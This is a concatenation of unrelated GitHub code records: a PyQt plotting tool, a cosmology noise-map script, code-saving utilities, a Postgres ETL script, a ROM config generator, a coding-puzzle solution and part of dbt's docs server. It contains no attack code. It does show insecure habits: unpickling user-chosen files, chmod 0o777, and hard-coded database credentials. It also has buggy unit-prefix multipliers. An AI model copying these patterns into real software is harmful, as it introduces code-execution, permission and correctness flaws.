self.textDialog.opacity.value() / 100\n            \n            #Add to canvas\n            self.saveFile(True)\n            \n            processedCanvas = []\n            for i in self.plots_canvases: # Process all canvas to an easy format to handle.\n                for j in i:\n                    processedCanvas.append(j.canvas)\n            \n            if currentText.plotted == True: # Delete the previous instance of this text if there was one.\n                currentText.textObject.remove()\n                processedCanvas[currentText.plotNum].draw()\n            \n            # Plot text\n            currentText.plotNum = self.textDialog.plotSelector.currentIndex()\n            selectedCanvas = processedCanvas[currentText.plotNum]\n\n            currentText.textObject = selectedCanvas.ax.text(currentText.x, currentText.y, currentText.text, ha=currentText.ha, va=currentText.va, rotation=currentText.rotation, fontsize=currentText.size, fontweight=currentText.weight, style=currentText.style, alpha=currentText.opacity, color=currentText.color)\n            selectedCanvas.draw()\n            \n            currentText.plotted = True\n            \n        else:\n            self.textDialog.errorMsgTxtDialog.setVisible(True)\n        \n\n    # Removes selected text in text dialog\n    def removeText(self):\n        if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n            currentTextList = self.textDialog.textList.currentItem()\n            currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n            currentText = self.textDialog.textListArray[currentTextIndex]\n\n            self.saveFile(True)\n            \n            processedCanvas = []\n            for i in self.plots_canvases: # Process all 
canvas to an easy format to handle.\n for j in i:\n processedCanvas.append(j.canvas)\n \n if currentText.plotted == True: # Delete the previous instance of this text if there was one.\n currentText.textObject.remove()\n processedCanvas[currentText.plotNum].draw()\n \n # Deletes text from list.\n listPositionText = self.textDialog.textList.currentItem() \n elementToRemove = self.textDialog.textList.row(listPositionText)\n del self.textDialog.textListArray[elementToRemove]\n self.textDialog.textList.takeItem(elementToRemove)\n self.updateTextDialog()\n \n \n if self.textDialog.textList.count() == 0:\n self.textDialog.updateButton.setEnabled(False)\n\n \n def closeTextDialog(self):\n self.textDialog.hide()\n \n #Edit color text\n def openColorPickerText(self, origin):\n dialog = QColorDialog(self)\n dialog.setCurrentColor(Qt.red)\n dialog.setOption(QColorDialog.ShowAlphaChannel)\n dialog.open()\n dialog.currentColorChanged.connect(self.updateTextColor)\n\n def updateTextColor(self, color):\n self.textDialog.colorValue.setText(color.name())\n self.textDialog.colorLabel.setStyleSheet(f'background-color: {color.name()}')\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n currentText.color = color.name()\n \n # Updates the text dialog to match the properties of the selected text \n def updateTextDialog(self):\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n self.textDialog.updateButton.setEnabled(True)\n if currentText.plotted == True:\n self.textDialog.textTitle.setText(currentText.title)\n self.textDialog.xValueText.setValue(currentText.x)\n self.textDialog.yValueText.setValue(currentText.y)\n self.textDialog.text.setPlainText(currentText.text)\n self.textDialog.fontSize.setValue(currentText.size)\n self.textDialog.HA.setCurrentText(currentText.ha)\n self.textDialog.VA.setCurrentText(currentText.va)\n self.textDialog.textRotation.setValue(currentText.rotation)\n self.textDialog.fontWeight.setCurrentText(currentText.weight)\n self.textDialog.style.setCurrentText(currentText.style)\n self.textDialog.opacity.setValue(currentText.opacity * 100)\n self.textDialog.colorValue.setText(currentText.color)\n self.textDialog.colorLabel.setStyleSheet(f'background-color: {currentText.color}')\n\n\n def derivate(self, x, y):\n\n dy = np.array([], dtype=np.float64)\n d = 0\n for i in range(x.shape[0]-1):\n d = np.float32((y[i+1] - y[i]) / (x[i+1] - x[i]))\n dy = np.append(dy, d)\n dx = x[:-1]\n\n return dx, dy\n\n def showZPWindow(self):\n zeros = self.selected_dataset_data.zeros[0]\n poles = self.selected_dataset_data.poles[0]\n self.zpWindow = ZPWindow(zeros, poles, self.selected_dataset_data.title)\n self.zpWindow.show()\n\n def newFile(self):\n self.droppedFiles = []\n self.datasets = []\n self.datalines = []\n self.selected_dataset_widget = {}\n self.selected_dataline_widget = {}\n self.selected_dataset_data = {}\n self.selected_dataline_data = {}\n self.zpWindow = type(ZPWindow, (), {})()\n self.updateAll()\n \n def saveFile(self, noprompt=False):\n if(noprompt):\n filename = 'temp.fto'\n 
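# noprompt=True acts as a silent autosave; updatePlots and friends call it on every refresh.\n        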
else:\n filename, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\",\"Filter tool file (*.fto)\")\n if(not filename): return\n with open(filename, 'wb') as f:\n flat_plots_canvas = [item.canvas for sublist in self.plots_canvases for item in sublist]\n plots_data = []\n for canv in flat_plots_canvas:\n plots_data.append(canv.get_properties())\n general_config = {\n 'labelsize_sb': self.plt_labelsize_sb.value(),\n 'legendsize_sb': self.plt_legendsize_sb.value(),\n 'ticksize_sb': self.plt_ticksize_sb.value(),\n 'titlesize_sb': self.plt_titlesize_sb.value(),\n 'legendpos': self.plt_legendpos.currentIndex(),\n 'grid': self.plt_grid.isChecked(),\n 'marginx': self.plt_marginx.value(),\n 'marginy': self.plt_marginy.value() \n }\n texts = [self.textDialog.textList.item(i).text() for i in range(self.textDialog.textList.count())]\n d = [self.datasets, self.datalines, plots_data, general_config, self.textDialog.textListArray, texts]\n pickle.dump(d, f, pickle.HIGHEST_PROTOCOL)\n\n def loadFile(self):\n filename, _ = QFileDialog.getOpenFileName(self,\"Select files\", \"\",\"Filter tool file (*.fto)\")\n if(not filename): return\n with open(filename, 'rb') as f:\n f.seek(0)\n self.datasets, self.datalines, plotdata, general_config, textListArray, textList = pickle.load(f)\n for t in textListArray:\n self.textDialog.textListArray.append(t) \n for t in textList:\n item = QListWidgetItem(t)\n self.textDialog.textList.addItem(item) \n self.plt_labelsize_sb.setValue(general_config['labelsize_sb'])\n self.plt_legendsize_sb.setValue(general_config['legendsize_sb'])\n self.plt_ticksize_sb.setValue(general_config['ticksize_sb'])\n self.plt_titlesize_sb.setValue(general_config['titlesize_sb'])\n self.plt_legendpos.setCurrentIndex(general_config['legendpos'])\n self.plt_grid.setChecked(general_config['grid'])\n self.plt_marginx.setValue(general_config['marginx'])\n self.plt_marginy.setValue(general_config['marginy']) \n acc = 0 \n for s in self.plots_canvases:\n for p in s:\n p.canvas.restore_properties(plotdata[acc])\n acc += 1\n for ds in self.datasets:\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, ds)\n qlwt.setText(ds.title)\n self.dataset_list.addItem(qlwt)\n for dl in ds.datalines:\n qlwt = QListWidgetItem()\n qlwt.setData(Qt.UserRole, dl)\n qlwt.setText(dl.name)\n self.dataline_list.addItem(qlwt)\n if(ds.type == 'filter'):\n self.filters.append(ds)\n self.selfil_cb.blockSignals(True)\n self.stages_selfil_cb.blockSignals(True)\n self.selfil_cb.addItem(ds.title, ds)\n self.stages_selfil_cb.addItem(ds.title, ds)\n self.selfil_cb.blockSignals(False)\n self.stages_selfil_cb.blockSignals(False)\n\n self.dataset_list.setCurrentRow(self.dataset_list.count() - 1)\n self.updateAll()\n \n def updateAll(self):\n self.updatePlots()\n self.updateSelectedDataline()\n self.updateFilterParametersAvailable()\n self.updateTexts()\n \n def getRelevantFrequencies(self, zeros, poles):\n singularitiesNorm = np.append(np.abs(zeros), np.abs(poles))\n singularitiesNormWithoutZeros = singularitiesNorm[singularitiesNorm!=0]\n if(len(singularitiesNormWithoutZeros) == 0):\n return (1, 1)\n return (np.min(singularitiesNormWithoutZeros), np.max(singularitiesNormWithoutZeros))\n \n def getMultiplierAndPrefix(self, val):\n multiplier = 1\n prefix = ''\n if(val < 1e-7):\n multiplier = 1e9\n prefix = 'n'\n elif(val < 1e-4):\n multiplier = 1e-6\n prefix = 'μ'\n elif(val < 1e-1):\n multiplier = 1e-3\n prefix = 'm'\n elif(val < 1e2):\n multiplier = 1\n prefix = ''\n elif(val < 1e5):\n multiplier = 1e3\n prefix = 'k'\n elif(val < 
1e8):\n multiplier = 1e6\n prefix = 'M'\n elif(val > 1e11):\n multiplier = 1e9\n prefix = 'G'\n return (multiplier, prefix)","repo_name":"Fditoro/PlotTool_Grupo5","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":62353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2840839793","text":"import sys\nsys.path.append(\"../..\")\n\nimport numpy as np\nimport SO_Noise_Calculator_Public_20180822 as so_n\nimport healpy as hp\nimport matplotlib.pyplot as plt\n\nnside = 16\nlmax = 500\nseed = 1234\nchannel = 2\n\nnh_LA = hp.ud_grade(\n hp.read_map(\"../../data/total_hits_LA_classical.fits.gz\", verbose=False),\n nside_out=nside,\n)\nnh_LA /= np.amax(nh_LA)\nfsky_LA = np.mean(nh_LA)\nls_LA, Nl_LA_T, Nl_LA_P, _ = so_n.Simons_Observatory_V3_LA_noise(1, fsky_LA, lmax, 1)\n# Extending to l=0\nNl_LA_Tb = np.zeros([len(Nl_LA_T), len(ls_LA) + 2])\nNl_LA_Tb[:, 2:] = Nl_LA_T\nNl_LA_Tb[:, :2] = 0.\nNl_LA_T = Nl_LA_Tb\nNl_LA_Pb = np.zeros([len(Nl_LA_P), len(ls_LA) + 2])\nNl_LA_Pb[:, 2:] = Nl_LA_P\nNl_LA_Pb[:, :2] = 0.\nNl_LA_P = Nl_LA_Pb\nls_LA = np.arange(len(ls_LA) + 2)\n\nnh_SA = hp.ud_grade(\n hp.read_map(\"../../data/total_hits_SA_classical.fits.gz\", verbose=False),\n nside_out=nside,\n)\nnh_SA /= np.amax(nh_SA)\nfsky_SA = np.mean(nh_SA)\nls_SA, Nl_SA_P, _ = so_n.Simons_Observatory_V3_SA_noise(1, 1, 1., fsky_SA, lmax, 1)\n# Extending to l=0\nNl_SA_Pb = np.zeros([len(Nl_SA_P), len(ls_SA) + 2])\nNl_SA_Pb[:, 2:] = Nl_SA_P\nNl_SA_Pb[:, :2] = 0.\nNl_SA_P = Nl_SA_Pb\nNl_SA_T = Nl_SA_P / 2.\nls_SA = np.arange(len(ls_SA) + 2)\n\n# Create maps\nnp.random.seed(seed)\nzeros = np.zeros(len(ls_LA))\nt_LA, q_LA, u_LA = hp.synfast(\n [Nl_LA_T[channel], Nl_LA_P[channel], Nl_LA_P[channel], zeros, zeros, zeros],\n nside=nside,\n pol=True,\n new=True,\n verbose=False,\n)\ngoodpix = np.where(nh_LA > 0)\nbadpix = np.where(nh_LA <= 0)\nfor m in [t_LA, q_LA, u_LA]:\n m[badpix] = 0\n m[goodpix] /= np.sqrt(nh_LA[goodpix])\n\nnp.random.seed(seed)\nt_SA, q_SA, u_SA = hp.synfast(\n [Nl_SA_T[channel], Nl_SA_P[channel], Nl_SA_P[channel], zeros, zeros, zeros],\n nside=nside,\n pol=True,\n new=True,\n verbose=False,\n)\ngoodpix = np.where(nh_SA > 0)\nbadpix = np.where(nh_SA <= 0)\nfor m in [t_SA, q_SA, u_SA]:\n m[badpix] = 0\n m[goodpix] /= np.sqrt(nh_SA[goodpix])\n\n# Write maps\nhp.write_map(\n \"noise_SA_uKCMB_classical_nside%d_channel%d_seed%d.fits\" % (nside, channel, seed),\n [t_SA, q_SA, u_SA],\n)\nhp.write_map(\n \"noise_LA_uKCMB_classical_nside%d_channel%d_seed%d.fits\" % (nside, channel, seed),\n [t_LA, q_LA, u_LA],\n)\n","repo_name":"galsci/mapsims","sub_path":"scripts/make_benchmark.py","file_name":"make_benchmark.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"22787910547","text":"import os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Union\n\nimport pandas as pd\nfrom hyperstyle.src.python.review.application_config import LanguageVersion\n\nfrom analysis.src.python.data_analysis.model.column_name import SubmissionColumns\nfrom analysis.src.python.evaluation.utils.pandas_utils import get_language_version\nfrom analysis.src.python.utils.file_utils import copy_directory, create_file, get_parent_folder\n\nTEMPLATE_DIRECTORY = Path(__file__).parents[3] / 'resources' / 'evaluation' / 'project_templates'\n\n\n@dataclass(frozen=True)\nclass TemplateConfig:\n template_path: Path\n 
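# Directory inside the template tree where solution sources are written.\n    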
template_root: Path\n filename: str\n\n\ndef get_template_config(language_version: LanguageVersion) -> TemplateConfig:\n if language_version.is_java():\n return TemplateConfig(template_path=TEMPLATE_DIRECTORY / 'java',\n template_root=Path('src', 'main', 'java'),\n filename='Main')\n\n elif language_version == LanguageVersion.PYTHON_3:\n return TemplateConfig(template_path=TEMPLATE_DIRECTORY / 'python',\n template_root=Path(),\n filename='main')\n\n raise NotImplementedError(f\"Template is not provided for language {language_version.value}. \"\n f\"Please implement template in {TEMPLATE_DIRECTORY}\")\n\n\ndef save_solutions_to_files(df_solutions: pd.DataFrame,\n language_version: LanguageVersion,\n input_path: Path,\n with_template: bool = False):\n \"\"\"\n Save solutions to input_path.\n If with_template=True copy language version specific template to input_path.\n Save given solutions to input_path according to structure described in `configure_solution_file` method.\n \"\"\"\n\n if with_template:\n # If template is required copy project template to input directory\n template_config = get_template_config(language_version)\n copy_directory(template_config.template_path, input_path)\n\n # Template set language specific requirements for solutions directory and filenames\n df_solutions.apply(save_solution_to_file,\n input_path=input_path / template_config.template_root,\n filename=template_config.filename,\n axis=1)\n\n else:\n df_solutions.apply(save_solution_to_file,\n input_path=input_path,\n axis=1)\n\n\ndef save_solution_to_file(solution: pd.Series,\n input_path: Path,\n filename: str = 'code') -> Path:\n \"\"\"\n Save solution code to file with path: input_path / root_path / solution_{solution_id} / filename.extension where:\n root_path = default_root_path by default but can be changes according to solution language version template\n filename = default_filename by default but can be changes according to solution language version template\n extension is selected according to solution language version\n\n Examples:\n java11 file with template: input_path/src/main/java/solution_12/Main.java\n java11 file without template: input_path/solution_12/code.java\n\n python3 file with template: input_path/solution_13/main.py\n python3 file without template: input_path/solution_13/code.py\n\n js file without template: input_path/solution_14/code.js\n \"\"\"\n\n solution_id = solution[SubmissionColumns.ID.value]\n solution_code = solution[SubmissionColumns.CODE.value]\n lang = solution[SubmissionColumns.LANG.value]\n language_version = get_language_version(lang)\n extension = language_version.extension_by_language()\n\n solution_file_path = input_path / f'solution_{solution_id}' / f'{filename}{extension.value}'\n\n return save_code_to_file(solution_file_path, solution_code)\n\n\ndef save_code_to_file(file_path: Union[Path, str], code: str) -> Path:\n \"\"\" Save solution code to given file_path. 
\"\"\"\n\n solution_file_path = next(create_file(file_path, code))\n os.chmod(solution_file_path, 0o777)\n return solution_file_path\n\n\ndef get_solution_id_by_file_path(solution_file_path: str) -> int:\n \"\"\"\n As solution is store like input_path / root_path / solution_{solution_id} / filename.extension\n we can easily parse solution id from file_path.\n \"\"\"\n\n parent_directory = get_parent_folder(solution_file_path)\n _, solution_id = parent_directory.name.split('_')\n return int(solution_id)\n","repo_name":"nbirillo/hyperstyle-analyze","sub_path":"analysis/src/python/evaluation/tools/utils/saving_utils.py","file_name":"saving_utils.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"17260630356","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"Insert records into songs and artists tables using data from a single song_data file.\"\"\"\n \n # open song file\n df = pd.read_json(filepath, lines=True) \n\n # create song dataframe and change the data to list\n song_data = df[[\"song_id\",\"title\",\n \"artist_id\",\"year\",\n \"duration\"\n ]].values.tolist()\n \n song_data = (song_data[0][0],song_data[0][1],\n song_data[0][2],song_data[0][3],\n song_data[0][4])\n \n # insert songplay record \n try:\n cur.execute(song_table_insert, song_data)\n except psycopg2.Error as e: \n print(\"Error:this line has corrupted data\")\n print (e)\n \n # create artist dataframe\n artist_data = df[[\"artist_id\", \"artist_name\", \n \"artist_location\", \"artist_latitude\", \n \"artist_longitude\"\n ]].values.tolist()\n \n artist_data = (artist_data[0][0], artist_data[0][1], \n artist_data[0][2], artist_data[0][3], \n artist_data[0][4])\n \n # Change the data to list and run cur.execute to insert data\n cur.execute(artist_table_insert, artist_data)\n\n\ndef process_log_file(cur, filepath):\n \"\"\"Insert records into time and user tables using data from a single log_data file.\"\"\"\n \n # open log file\n df = pd.read_json(filepath, lines=True)\n\n # filter by NextSong action\n df = df.loc[df['page'] == 'NextSong']\n\n # convert datetime column to timestamp, hour, day,\n # weekofyear, month, year, weekday\n t = pd.to_datetime(df['ts'], unit='ms')\n time_data_list = t.tolist()\n time_data_list2 = []\n for i in time_data_list:\n time_data_list2.append([i, i.hour, \n i.day,i.weekofyear,\n i.month, i.year,\n i.strftime('%A')\n ])\n \n # Create time dataframe before insert time data records\n time_data = time_data_list2\n column_labels = (\n 'timestamp','hour',\n 'day','week_of_year',\n 'month','year','weekday')\n time_df = pd.DataFrame(time_data, columns=column_labels )\n \n # Loop through each time row and insert into time table\n for i, row in time_df.iterrows():\n #print(list(row))\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = pd.DataFrame(df, columns=[\"userId\",\"firstName\", \n \"lastName\",\"gender\",\n \"level\"\n ])\n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # Loop through each log files for data and insert songplay records\n for index, row in df.iterrows():\n # get songid and artistid from song and artist tables\n cur.execute(song_select,(row.song , row.artist ,row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n #print(songid + \" 
\"+ artistid)\n # insert songplay record\n songplay_data = ( \n t[index], row.userId, \n row.level,songid, artistid, \n row.sessionId , row.location, \n row.userAgent )\n \n cur.execute(songplay_table_insert, songplay_data)\n\n\ndef process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n \n \"\"\" This line fix a encoding problem during the runtime \"\"\"\n conn.set_client_encoding('UTF8')\n\n \n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"kent5i5/postgre_bigdata","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34879519729","text":"#! /usr/bin/python3\n\nimport argparse\nfrom util import rominfo\nfrom segtypes.code import N64SegCode\n\nparser = argparse.ArgumentParser(description=\"Create a splat config from a rom\")\nparser.add_argument(\"rom\", help=\"path to a .z64 rom\")\n\n\ndef main(rom_path):\n rom = rominfo.get_info(rom_path)\n basename = rom.name.replace(\" \", \"\").lower()\n\n header = \\\n\"\"\"name: {0} ({1})\nbasename: {2}\noptions:\n find-file-boundaries: True\n compiler: \"IDO\"\n\"\"\".format(rom.name.title(), rom.get_country_name(), basename)\n\n # codeseg = N64SegCode(0x1000, rom.size, \"asm\", \"firstseg\", rom.entry_point, [{\"start\": 0x1000, \"end\": rom.size, \"name\": \"firstseg\", \"vram\": rom.entry_point, \"subtype\": \"asm\"}], {})\n # codeseg.split\n\n segments = \\\n\"\"\"segments:\n - name: header\n type: header\n start: 0x0\n vram: 0\n files:\n - [0x0, header, header]\n - name: boot\n type: bin\n start: 0x40\n - name: the_rest\n type: bin\n start: 0x1000\n - [0x{:X}]\n\"\"\".format(rom.size)\n\n outstr = header + segments\n \n outname = rom.name.replace(\" \", \"\").lower()\n with open(outname + \".yaml\", \"w\", newline=\"\\n\") as f:\n f.write(outstr)\n \nif __name__ == \"__main__\":\n args = parser.parse_args()\n main(args.rom)\n","repo_name":"zestydevy/paint-studio","sub_path":"tools/n64splat/create_config.py","file_name":"create_config.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"12512196634","text":"#User function Template for python3\n\nclass Solution:\n #Complete this function\n # Function to find the maximum index difference.\n def maxIndexDiff(self,A, N): \n max_sum = 0\n for i in range(N):\n for j in range(N-1, 0, -1):\n if A[i] <= A[j] and i <= j:\n max_sum = max(j-i, max_sum)\n break\n \n return max_sum\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nimport math\n\ndef main():\n T=int(input())\n while(T>0):\n \n n=int(input())\n \n arr=[int(x) for x in 
input().strip().split()]\n ob=Solution()\n print(ob.maxIndexDiff(arr,n))\n \n \n T-=1\n\n\nif __name__ == \"__main__\":\n main()\n# } Driver Code Ends","repo_name":"piyushrs/GFG","sub_path":"maximum_index.py","file_name":"maximum_index.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19709738174","text":"import pandas as pd\nimport sys\nimport numpy as np\n\n\ndef read_data(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n train= pd.read_csv(data_file)\n target='bug'\n IDcol='name'\n x_columns = [x for x in train.columns if x not in [target,IDcol]]\n metrics_num=len(x_columns) \n print(\"The Number of metrics: \"+str(metrics_num))\n all_data = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=range(1, metrics_num+1))\n return all_data\n else:\n print(\"Unsupported File: \" + data_file)\n sys.exit()\n \ndef read_data_python(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n train= pd.read_csv(data_file)\n target='bug'\n IDcol='name'\n x_columns = [x for x in train.columns if x not in [target,IDcol]]\n metrics_num=len(x_columns) \n print(\"The Number of metrics: \"+str(metrics_num))\n all_data = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=range(1, metrics_num+1))\n all_label = np.loadtxt(data_file, dtype=float, delimiter=',', skiprows=1,usecols=metrics_num+1)\n\n return all_data,all_label\n \n else:\n print(\"Unsupported File: \" + data_file)\n sys.exit()\n\ndef read_text_data(data_file):\n if 'csv' == data_file.split(\".\")[-1]:\n handle=open(data_file,'r')\n lines=handle.readlines()\n result_list=[]\n for each_line in lines:\n result_list.append(each_line)\n return result_list\n \ndef defect_data_read(data_file):\n \n class_loc_dict={}\n class_defect_dict={}\n class_name_list=[]\n \n defect_file=open(data_file,'r')\n lines=defect_file.readlines()\n for index,each_line in enumerate(lines):\n if(index!=0):\n records=each_line.strip('\\n').split(',')\n class_name=records[0]\n class_loc_dict[class_name]=float(records[1])\n defect_count=int(records[21])\n class_defect_dict[class_name]=defect_count\n class_name_list.append(class_name)\n \n return class_name_list,class_loc_dict,class_defect_dict","repo_name":"quyutest/node2defect","sub_path":"SupportingTools/ReadFile.py","file_name":"ReadFile.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"29035537847","text":"import alice.tests.library.directives as directives\nimport alice.tests.library.scenario as scenario\nimport alice.tests.library.surface as surface\nimport pytest\n\n\n@pytest.mark.experiments(\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.link_a_remote',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu_check.status',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu_manual.start',\n 'bg_fresh_granet_form=personal_assistant.scenarios.quasar.setup_rcu.stop',\n 'bg_fresh_granet_form=personal_assistant.scenarios.request_technical_support',\n)\nclass TestLinkARemote(object):\n\n owners = ('flimsywhimsy')\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.parametrize('command', [\n 'подключи пульт',\n 'прицепи умный пульт управления яндекс',\n 'алиса включи настройку умного пульта управления к станции',\n ])\n def test_link_a_remote(self, alice, command):\n response = alice(command)\n assert 
response.scenario == scenario.LinkARemote\n assert len(response.directives) == 2\n assert response.directives[0].name == directives.names.SetupRcuDirective\n\n @pytest.mark.parametrize('surface', [surface.searchapp])\n def test_link_a_remote_fail(self, alice):\n response = alice('подключи пульт')\n assert response.scenario == scenario.LinkARemote\n assert response.text == 'Я не умею подключать пульт здесь.'\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.device_state(rcu={\n 'is_rcu_connected': True,\n 'setup_state': 0,\n })\n def test_link_a_remote_skip_setup_rcu(self, alice):\n response = alice('настрой пульт')\n assert response.scenario == scenario.LinkARemote\n assert len(response.directives) == 2\n assert response.directives[0].name == directives.names.SetupRcuAutoDirective\n\n @pytest.mark.parametrize('surface', [surface.station_pro])\n @pytest.mark.device_state(rcu={\n 'is_rcu_connected': True,\n })\n @pytest.mark.parametrize('command, status, setup_state, expected_directives', [\n ('setup_rcu_status_frame', 'Success', 1, [directives.names.SetupRcuAutoDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_status_frame', 'Error', 1, [directives.names.SetupRcuDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_status_frame', 'InactiveTimeout', 1, []),\n ('setup_rcu_auto_status_frame', 'Success', 2, [directives.names.SetupRcuCheckDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_auto_status_frame', 'Error', 2, [directives.names.SetupRcuManualDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_check_status_frame', 'Success', 3, [directives.names.GoHomeDirective]),\n ('setup_rcu_check_status_frame', 'Error', 3, [directives.names.SetupRcuAdvancedDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_check_status_frame', 'InactiveTimeout', 3, []),\n ('setup_rcu_advanced_status_frame', 'Success', 4, [directives.names.SetupRcuCheckDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_advanced_status_frame', 'Error', 4, [directives.names.SetupRcuAdvancedDirective, directives.names.TtsPlayPlaceholderDirective]),\n ('setup_rcu_auto_start_frame', 'Samsung', 5, [directives.names.SetupRcuAutoDirective, directives.names.TtsPlayPlaceholderDirective]),\n ])\n def test_typed_semantic_frame(self, alice, command, status, setup_state, expected_directives):\n alice.device_state.RcuState.SetupState = setup_state\n\n response = alice.call(command, status)\n assert response.scenario == scenario.LinkARemote\n directive_names = [_.name for _ in response.directives]\n assert directive_names == expected_directives\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/link_a_remote/testpalm_link_a_remote.py","file_name":"testpalm_link_a_remote.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39362254249","text":"import re\n\n\ndef without_regexp(line):\n dic = {}\n i = 0\n j = 0\n while i != -1:\n i = line.find('(', i + 1)\n j = line.find(')', j + 1)\n dic[i] = 'i'\n dic[j] = 'j'\n\n parenthesis_count = 0\n start_index = 0\n start_index2 = 0\n end_index = 0\n distance_more_than_one = False\n new_line = ''\n for k in sorted(dic.keys())[1:]:\n if dic[k] == 'i' and not parenthesis_count:\n parenthesis_count += 1\n end_index = k\n new_line += line[start_index:end_index]\n distance_more_than_one = False\n 
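# Remember where the newly opened parenthesis group starts.\n            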
start_index = k\n continue\n elif dic[k] == 'i' and parenthesis_count >= 1:\n start_index2 = k\n parenthesis_count += 1\n continue\n elif dic[k] == 'j' and parenthesis_count == 2:\n end_index = k + 1\n if start_index2 - start_index == 1:\n new_line += line[start_index:end_index]\n parenthesis_count = 0\n distance_more_than_one = False\n start_index = k + 1\n else:\n parenthesis_count -= 1\n distance_more_than_one = True\n continue\n elif dic[k] == 'j' and parenthesis_count == 1:\n end_index = k + 1\n parenthesis_count -= 1\n if distance_more_than_one and parenthesis_count:\n new_line += ''\n else:\n new_line += line[start_index:end_index]\n start_index = k + 1\n continue\n return new_line\n\n\ndef sub_func(m):\n new = m.group(0)[0]\n return f'{new}'\n\n\ndef with_regexp(line):\n new_line = re.sub(r'[^(]([(][a-zA-Z0-9]+.+)', sub_func, line)\n return new_line\n\n\nif __name__ == '__main__':\n line = 'abra((esdf)(esdf'\n without_regexp(line)\n with_regexp(line)\n","repo_name":"amozalev/parentheses-count","sub_path":"parentheses.py","file_name":"parentheses.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33225231597","text":"import shutil\nimport os\nimport webbrowser\n\nfrom dbt.include.global_project import DOCS_INDEX_FILE_PATH\nfrom http.server import SimpleHTTPRequestHandler\nfrom socketserver import TCPServer\nfrom dbt.events.functions import fire_event\nfrom dbt.events.types import ServingDocsPort, ServingDocsAccessInfo, ServingDocsExitInfo, EmptyLine\n\nfrom dbt.task.base import ConfiguredTask\n\n\nclass ServeTask(ConfiguredTask):\n def run(self):\n os.chdir(self.config.target_path)\n\n port = self.args.port\n address = \"0.0.0.0\"\n\n shutil.copyfile(DOCS_INDEX_FILE_PATH, \"index.html\")\n\n fire_event(ServingDocsPort(address=address, port=port))\n fire_event(ServingDocsAccessInfo(port=port))\n fire_event(EmptyLine())\n fire_event(EmptyLine())\n fire_event(ServingDocsExitInfo())\n\n # mypy doesn't think SimpleHTTPRequestHandler is ok here, but it is\n httpd = TCPServer( # type: ignore\n (address, port), SimpleHTTPRequestHandler # type: ignore\n ) # type: ignore\n\n if 